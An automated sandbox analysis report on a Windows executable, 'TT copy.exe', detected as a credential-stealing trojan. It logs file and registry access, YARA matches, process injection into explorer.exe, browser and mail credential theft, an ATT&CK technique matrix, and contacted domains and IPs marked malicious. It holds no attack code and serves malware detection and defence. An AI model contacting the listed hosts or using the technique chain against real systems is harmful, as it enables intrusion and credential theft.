            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\TT copy.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\TT copy.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\rundll32.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: C:\Windows\SysWOW64\rundll32.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\rundll32.exe; File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

            Remote Access Functionality

            Source: Yara match; File source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 1 Shared Modules | Path Interception | 612 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 612 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 114 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 3 Obfuscated Files or Information | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Rundll32 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 13 Software Packing | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Timestomp | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 File Deletion | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |
Behavior Graph ID: 638587, Sample: TT copy.exe, Startdate: 03/06/2022, Architecture: WINDOWS, Score: 100

Graph root
  DNS/IP: www.airvataus.com
  DNS/IP: airvataus.com
  Signature: Snort IDS alert for network traffic
  Signature: Found malware configuration
  Signature: Malicious sample detected (through community Yara rule)
  Signature: 10 other signatures
  TT copy.exe (started)
    Dropped file: C:\Users\user\AppData\...\TT copy.exe.log, ASCII
    Signature: Injects a PE file into a foreign processes
    TT copy.exe (started)
      Signature: Modifies the context of a thread in another process (thread injection)
      Signature: Maps a DLL or memory area into another process
      Signature: Sample uses process hollowing technique
      Signature: Queues an APC in another process (thread injection)
      explorer.exe (injected)
        DNS/IP: www.sinsegae.net, 185.254.241.173, 49780, 80, PINGTAN-AS-APKirinNetworksCN, United Kingdom
        DNS/IP: www.shopcycles3.com, 162.213.255.237, 49783, 80, NAMECHEAP-NETUS, United States
        DNS/IP: 12 other IPs or domains
        Signature: System process connects to network (likely due to code injection or exploit)
        rundll32.exe (started)
          DNS/IP: www.sassafrasriver.info
          Signature: System process connects to network (likely due to code injection or exploit)
          Signature: Tries to steal Mail credentials (via file / registry access)
          Signature: Self deletion via cmd or bat file
          Signature: 4 other signatures
          cmd.exe (started)
            Signature: Tries to harvest and steal browser information (history, passwords, etc)
            conhost.exe (started)
          cmd.exe (started)
            conhost.exe (started)

| Source | Detection | Scanner | Label |
|---|---|---|---|
| TT copy.exe | 34% | Virustotal | |
| TT copy.exe | 100% | Avira | HEUR/AGEN.1236582 |
| TT copy.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| 3.0.TT copy.exe.520000.0.unpack | 100% | Avira | HEUR/AGEN.1236582 |
| 3.0.TT copy.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 0.0.TT copy.exe.520000.0.unpack | 100% | Avira | HEUR/AGEN.1236582 |
| 0.2.TT copy.exe.520000.0.unpack | 100% | Avira | HEUR/AGEN.1236582 |
| 3.0.TT copy.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 3.0.TT copy.exe.520000.1.unpack | 100% | Avira | HEUR/AGEN.1236582 |
| 3.0.TT copy.exe.520000.3.unpack | 100% | Avira | HEUR/AGEN.1236582 |
| 3.0.TT copy.exe.520000.5.unpack | 100% | Avira | HEUR/AGEN.1236582 |
| 3.2.TT copy.exe.520000.1.unpack | 100% | Avira | HEUR/AGEN.1236582 |
| 3.0.TT copy.exe.520000.7.unpack | 100% | Avira | HEUR/AGEN.1236582 |
| 3.0.TT copy.exe.520000.2.unpack | 100% | Avira | HEUR/AGEN.1236582 |
| 3.0.TT copy.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 3.2.TT copy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 3.0.TT copy.exe.520000.9.unpack | 100% | Avira | HEUR/AGEN.1236582 |
            No Antivirus matches
                                                                                            high
                                                                                            http://www.sassafrasriver.info/umat/Lrundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.jiyu-kobo.co.jp/TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goorundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.fontbureau.com/designers8TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.sassafrasriver.info/umat/9rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.sassafrasriver.info/umat/:rundll32.exe, 0000000F.00000002.775195320.00000000034E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.google.com/intl/en_uk/chrome/lrundll32.exe, 0000000F.00000002.775080171.000000000346A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.google.com/urlsa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQFrundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3ktrundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.sassafrasriver.info/umat/0rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
107.187.232.173 | www.sarrafguler.com | United States | 18779 | EGIHOSTINGUS | true
154.36.145.110 | www.huayugw.com | United States | 174 | COGENT-174US | true
185.254.241.173 | www.sinsegae.net | United Kingdom | 136782 | PINGTAN-AS-APKirinNetworksCN | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
162.213.255.237 | www.shopcycles3.com | United States | 22612 | NAMECHEAP-NETUS | true
18.193.36.153 | d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
66.96.162.130 | www.408wmountain.info | United States | 29873 | BIZLAND-SDUS | true
198.44.241.20 | www.huiyi-sui.com | United States | 26484 | IKGUL-26484US | true
                                                                                                          IP
                                                                                                          172.16.0.13
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 638587
Start date and time: 2022-06-03 08:14:09 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 45s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: TT copy.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 34
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
